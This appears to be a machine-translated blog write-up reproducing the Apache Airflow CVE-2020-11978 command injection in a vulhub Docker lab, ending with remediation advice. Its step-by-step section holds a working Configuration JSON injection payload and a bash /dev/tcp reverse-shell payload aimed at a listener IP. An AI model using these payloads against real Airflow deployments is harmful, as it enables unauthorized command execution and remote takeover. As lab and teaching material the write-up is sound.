Preface

Since I learned java After tool development , There are very few contact vulnerabilities , In the past, when I was still safe, I would repeat an article every day , After turning the direction, I didn't touch the loophole . Just yesterday , A pretty guy came to me with a question , Ask me if I will Apache Airflow(CVE-2020-11978) This loophole , therefore , With this blog post ,CVE-2020-11978 Loophole recurrence .

Tips ： The following is the main body of this article , The following cases can be used for reference

1. Vulnerability information supplement

Airflow It's a use python language-written data pipeline Platform for scheduling and monitoring workflow .Airflow It's through DAG（Directed acyclic graph Directed acyclic graph ） Task scheduling tool to manage task flow , You don't need to know the specific content of business data , Task scheduling can be realized by setting task dependencies .
This platform owns and Hive、Presto、MySQL、HDFS、Postgres And so on , And provided hooks （hook） So that it has good scalability . Except for a command line interface , The tool also provides a tool based on Web The user interface can visualize pipeline dependencies 、 Monitoring progress 、 Trigger tasks, etc .

2. Vulnerability profile

Apache Airflow It's an open source , Distributed task scheduling framework . In its 1.10.10 Version and previous examples DAG There is a command injection vulnerability in , Unauthorized visitors can use this vulnerability in Worker Execute arbitrary commands in .

3. Affects version

Apache Airflow <= 1.10.10

4. Loophole recurrence

One 、 start-up vulhub Range environment

No, vulhub Go to the next one vulhub, Just follow the steps to extract the installation package . If vulhub The version is always free of this vulnerability , Download a new vulhub Just go , The second one as shown in the figure below airflow Namely .

Get into CVE-2020-11978 Folder

Enter the following command to start

docker-compose run airflow-init

docker-compose up -d

Access vulnerability address ：http://127.0.0.1:8080 that will do

Because it is inconvenient to operate in the virtual machine , In the virtual machine ifconfig Command get to ip The address is 192.168.25.130, Use this ip Replace 127.0.0.1 You can access it in your local browser , As shown below ：

Be careful ！ Because the vulnerability environment is relatively large , The startup time is very slow , It is not accessible at once , I don't know how long to wait , I started the environment the night before , Found it inaccessible 8080 port , After a nap , To access , So don't worry , Wait patiently after the environment is started , You can do something else first .

Two 、 Command execution

visit http://192.168.25.130:8080 Get into airflow The management end , take example_trigger_target_dag Ahead Off Change it to On.

Get into example_trigger_target_dag page , Click on Trigger DAG, Go to the debug page .

stay Configuration JSON Input in ：

{
    "message":"'\";touch /tmp/what_the_fuck;#"}

Click again Trigger perform dag.
Wait a few seconds to see the successful execution .

Show success, It means success .

Enter the container to view the directory , Found successfully created /tmp/what_the_fuck file , The loophole reappears successfully .

docker-compose exec airflow-worker bash

3、 ... and 、NC rebound shell

Since the top can be used touch File created , So bounce one shell Come back , It's not a big problem , Let's look at the operation .

attack 192.168.230.234 Turn on nc, monitor 9999 port .

stay Configuration JSON Input in ：

{
    "message":"'\";bash -i >& /dev/tcp/192.168.230.234/9999 0>&1;#"}

{“message”:“'”;;#"}, Click again Trigger perform dag.

Successful rebound shell, The command can be executed .

5. Repair suggestions

1、 Upgrade to 1.10.10 After the version
2、 Delete or disable the default DAG（ You can delete or disable the default in the configuration file DAGload_examples=False）

summary

Loophole recurrence is simple , But the principle is still a little confused , It is recommended that you reproduce the vulnerability at the same time , And understand the principle .

     Original article , Welcome to reprint , Please indicate the source of the article ： （CVE-2020-11978）Airflow dag Command injection vulnerability in 【vulhub shooting range 】. Baidu and all kinds of collection stations are not credible , Search carefully to identify . Technical articles generally have timeliness , I am used to revise and update my blog posts from time to time , So visit the source to see the latest version of this article .